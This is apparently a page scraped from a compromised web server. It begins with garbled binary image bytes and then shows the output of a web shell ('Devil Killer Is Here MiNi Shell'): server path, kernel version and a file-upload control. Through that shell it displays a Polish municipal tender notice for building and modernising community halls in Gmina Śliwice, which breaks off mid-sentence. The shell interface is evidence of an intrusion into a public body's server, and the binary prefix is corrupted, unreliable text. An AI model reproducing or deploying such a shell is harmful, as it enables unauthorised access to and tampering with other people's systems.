JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220630/0023345201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozwój infrastruktury kulturalnej na terenie Gminy Śliwice </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Śliwice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092351140</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ks. dra St. Sychowskiego 30</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Śliwice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-530</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL618 - Świecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">52 3340710</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@sliwice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.sliwice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozwój infrastruktury kulturalnej na terenie Gminy Śliwice </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e75de7a2-f6bf-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00233452</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00000776/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Rozwój infrastruktury kulturalnej na terenie Gminy Śliwice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/sliwice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/sliwice</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami prowadzona jest pisemnie w języku polskim (w rozumieniu art. 20 i art. 7 pkt. 16 PZP) przy użyciu środka komunikacji elektronicznej -jakim jest- platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/sliwice, w zakładce<br/>„POSTĘPOWANIA” i pod nazwą postępowania wskazaną w tytule SWZ.<br/>2. W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były za pośrednictwem platformazakupowa.pl i formularza „Wyślij<br/>wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się<br/>datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego. Zamawiający dopuszcza awaryjnie np. w przypadku przerwy w funkcjonowaniu lub awarii lub niedziałania Platformy zakupowej, komunikację z wykonawcami za pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami: przetargi@sliwice.pl, z zastrzeżeniem, że ofertę (w szczególności Formularz oferty i załączniki do oferty) wykonawca może złożyć wyłącznie za pośrednictwem Platformy zakupowej.<br/>3. Zamawiający będzie przekazywał wykonawcom informacje pisemnie (w rozumieniu art. 20 i art. 7 pkt. 16 PZP) przy użyciu środka komunikacji elektronicznej - jakim jest - platformazakupowa.pl.<br/>Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie<br/>zamieszczał na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny Wykonawca, będzie przekazywana pisemnie (w rozumieniu art. 20 i art. 7 pkt. 16 PZP) przy użyciu środka komunikacji elektronicznej - jakim jest - platformazakupowa.pl do konkretnego wykonawcy. <br/>4. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez zamawiającego, gdyż<br/>system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>5. Zamawiający, zgodnie z rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452) określa<br/>niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c. zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>d. włączona obsługa JavaScript,<br/>e. zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f. Szyfrowanie na platformazakupowa.pl obywa się za pomocą protokołu TLS 1.3.<br/>g. Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>6. Dalsze informacje w rozdziale VIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1. administratorem Pani/Pana danych osobowych jest Gmina Śliwice reprezentowana przez Wójta Gminy Śliwice, z siedzibą Urzędu Gminy ul. ks. dra Sychowskiego 30, 89-530 Śliwice;<br/>2. administrator wyznaczył Inspektora Ochrony Danych, z którym można się skontaktować poprzez adres poczty elektronicznej<br/>iod.gmina@sliwice.pl lub pisemnie na adres Urzędu Gminy;<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie podstawowym na podstawie art. 275 ust 1 ustawy;<br/>4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy;<br/>5. Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do realizacji celów określonych w pkt 3, a po tym czasie<br/>przez okres wymagany przez przepisy powszechnie obowiązującego prawa;<br/>6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>8. posiada Pani/Pan:<br/>1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; 2) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9. nie przysługuje Pani/Panu:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZ.271.1.6.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest „Rozwój infrastruktury kulturalnej na terenie Gminy Śliwice”. <br/>2.	Zakres zamówienia został podzielony na części:<br/>1)	Część I - budowę świetlicy w m. Główka wraz z zagospodarowaniem terenu, <br/>2)	Część II - budowę świetlicy w m. Laski wraz z zagospodarowaniem terenu, <br/>3)	Część III - modernizację świetlicy w Brzeźnie,<br/>4)	Część IV - modernizację świetlicy w Byłyczku. <br/>3.	Zamówienie jest dofinansowane ze środków pochodzących z Programu Rządowego Fundusz Polski Ład: Program Inwestycji Strategicznych<br/>4.	Zamawiający może unieważnić niniejsze postępowanie o udzielenie zamówienia, jeżeli środki publiczne, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane. <br/>5.	Opis części przedmiotu zamówienia: <br/>5.1. Część 1 budowa świetlicy w m. Główka wraz z zagospodarowaniem terenu<br/>5.1.1	Przedmiotem zamówienia jest zmiana zagospodarowania terenu polegającą na budowie budynku kulturalno – oświatowego (świetlicy) z zewnętrzną instalacją wodociągową i kanalizacji sanitarnej z odprowadzeniem do bezodpływowego zbiornika na nieczystości ciekłe o poj. 9,8 m3 oraz utwardzeniem powierzchni gruntu, na terenie działek nr 608, 715 obręb Zwierzyniec, gmina Śliwice.<br/>5.1.2	Stan istniejący.<br/>Działka o nr ewid. 715 zabudowana jest budynkiem usługowym oraz drewnianą wiatą (te elementy zagospodarowania przeznaczone do rozbiórki). Na działce występuje infrastruktura podziemna w postaci przyłącza wodociągowego wraz ze studnią wodomierzową oraz infrastruktura nadziemna – napowietrzne linie elektroenergetyczne ze słupem. Ukształtowanie działki płaskie. Część powierzchni działki utwardzona jest kruszywem, pozostały obszar porośnięty trawą. Na działce występuje fragment ogrodzenia. Działka o nr ewid. 608 nie jest zabudowana, występuje na niej roślinność ozdobna. Część działki posiada nawierzchnie utwardzone kruszywem oraz asfaltem. Działka posiada dostęp do drogi publicznej poprzez istniejący zjazd. <br/>5.1.3	Projektowane zagospodarowanie terenu, w tym:<br/>1.	urządzenia budowlane związane z obiektami budowalnymi:<br/>-	zewnętrzna instalacja wodociągowa PE  32;<br/>-	zewnętrzna instalacja kanalizacji sanitarnej PCV  160 wraz ze studniami rewizyjnymi  425 i 600 mm;<br/>-	bezodpływowy zbiornik na nieczystości ciekłe o poj. 9,8 m3;<br/>-	miejsce gromadzenia odpadów stałych;<br/>-	utwardzenie powierzchni gruntu z kostki betonowej<br/>-	napowietrzne przyłącze energetyczne (istniejące). <br/>2.	sposób odprowadzania lub oczyszczania ścieków<br/>Ścieki odprowadzane będą do szczelnego, wybieralnego, bezodpływowego zbiornika na nieczystości ciekłe o pojemności 9,8 m3 (czynnej 9,0 m3) poprzez projektowaną zewnętrzną instalację kanalizacji sanitarnej.<br/>3.	układ komunikacyjny<br/>Układ komunikacyjny na terenie objętym opracowaniem stanowić będą projektowane utwardzenia powierzchni gruntu o nawierzchni z kostki betonowej grubości 8 cm.<br/>4.	sposób dostępu do drogi publicznej<br/>Dostęp na teren objęty opracowaniem poprzez istniejący zjazd publiczny z działki 547/1 stanowiącej drogę gminną o nawierzchni asfaltowej.<br/>5.	parametry techniczne sieci i urządzeń uzbrojenia terenu<br/>-	instalacja wodociągowa PE  32 L=26,00 m;<br/>-	zewnętrzna instalacja kanalizacji sanitarnej PCV 160 L= 17,44 m;<br/>-	zbiornik bezodpływowy żelbetowy 2,4 x 3,0 x 1,85 m;<br/>-	studnia rewizyjna tworzywowa  425 i 600 mm;<br/>-	istniejące elektroenergetyczne przyłącze napowietrzne (przed rozpoczęciem robót rozbiórkowych budynku usługowego należy zgłosić odłączenie przyłącza napowietrznego energetycznego w Rejonie Energetycznym Chojnice).<br/>6.	uksztaltowanie terenu i układ zieleni<br/>Ukształtowanie terenu nie ulegnie zmianie, inwestycja dostosowana do istniejących rzędnych terenu. Układ zieleni stanowić będą istniejące trawniki.<br/>5.1.4	Zestawienie powierzchni:<br/>1.	powierzchnia zabudowy projektowanych i istniejących obiektów budowlanych<br/>-	Powierzchnia zabudowy istniejącego budynku usługowego - 28,70 m2<br/>-	Powierzchnia zabudowy istniejących wiaty - 9,55 m2<br/>-	Powierzchnia zabudowy projektowanego budynku kulturalno - oświatowego - 122,94 m2<br/>-	Powierzchnia zabudowy zadaszonego tarasu - 32,64 m2<br/>2.	powierzchnia dróg, parkingów, placów i chodników<br/>-	Powierzchnia proj. utwardzeń o nawierzchni z kostki betonowej gr. 8 cm - 265,00 m2<br/>3.	powierzchnia biologicznie czynna<br/>Powierzchnia biologicznie czynna (trawniki) - 1 369,87 m2<br/>4.	powierzchnia innych części działki<br/>Elementy przewidziane do rozbiórki nie wliczone w zestawienie powierzchni:<br/>-	budynek usługowy o powierzchni 28,70 m2<br/>-	ogrodzenie 38,80 mb<br/>5.1.5	Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji projektowej zatwierdzonej decyzją pozwolenia na budowę nr BD.6740.ŚL.14.2022 z dnia 11 kwietnia 2022 r. oraz w dokumentacji projektowej stanowiącej Załącznik Nr 7.1 do SWZ, Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych stanowiącej Załącznik Nr 9.1 do SWZ i przedmiarze robót stanowiącym Załączniki nr 8.1. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45422000-1 - Roboty ciesielskie</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45421146-9 - Instalowanie sufitów podwieszanych</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45315100-9 - Instalacyjne roboty elektrotechniczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nie<br/>odrzuconych na podstawie kryteriów oceny ofert określonych w SWZ. 2. Przy wyborze ofert<br/>Zamawiający kierować się będzie następującym kryterium: A - Cena (waga 60%), B - Okres gwarancji<br/>jakości (waga 40%). 3. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane<br/>są punkty za powyższe kryteria. Zastosowanie będzie miał następujący wzór: P<br/>(punkty) = A+B 4. Za ofertę najkorzystniejszą zostanie uznana ta, która uzyskała największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest „Rozwój infrastruktury kulturalnej na terenie Gminy Śliwice”. <br/>2.	Zakres zamówienia został podzielony na części:<br/>1)	Część I - budowę świetlicy w m. Główka wraz z zagospodarowaniem terenu, <br/>2)	Część II - budowę świetlicy w m. Laski wraz z zagospodarowaniem terenu, <br/>3)	Część III - modernizację świetlicy w Brzeźnie,<br/>4)	Część IV - modernizację świetlicy w Byłyczku. <br/>3.	Zamówienie jest dofinansowane ze środków pochodzących z Programu Rządowego Fundusz Polski Ład: Program Inwestycji Strategicznych<br/>4.	Zamawiający może unieważnić niniejsze postępowanie o udzielenie zamówienia, jeżeli środki publiczne, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane. <br/>5.	Opis części przedmiotu zamówienia: <br/>5.2 Część 2 budowa świetlicy w m. Laski wraz z zagospodarowaniem terenu<br/>5.2.1	Przedmiotem zamówienia jest zmiana zagospodarowania terenu polegająca na budowie budynku kulturalno – oświatowego (świetlicy) z zewnętrzną instalacją wodociągową i kanalizacji sanitarnej z odprowadzeniem do bezodpływowego zbiornika na nieczystości ciekłe o poj. 9,8 m3 oraz utwardzeniem powierzchni gruntu na terenie działki nr 243 obręb Laski, gmina Śliwice.<br/>5.2.2 Istniejący stan zagospodarowania działki Działka o nr ewid. 243 zabudowana jest budynkiem gospodarczym oraz drewnianymi wiatami, występują 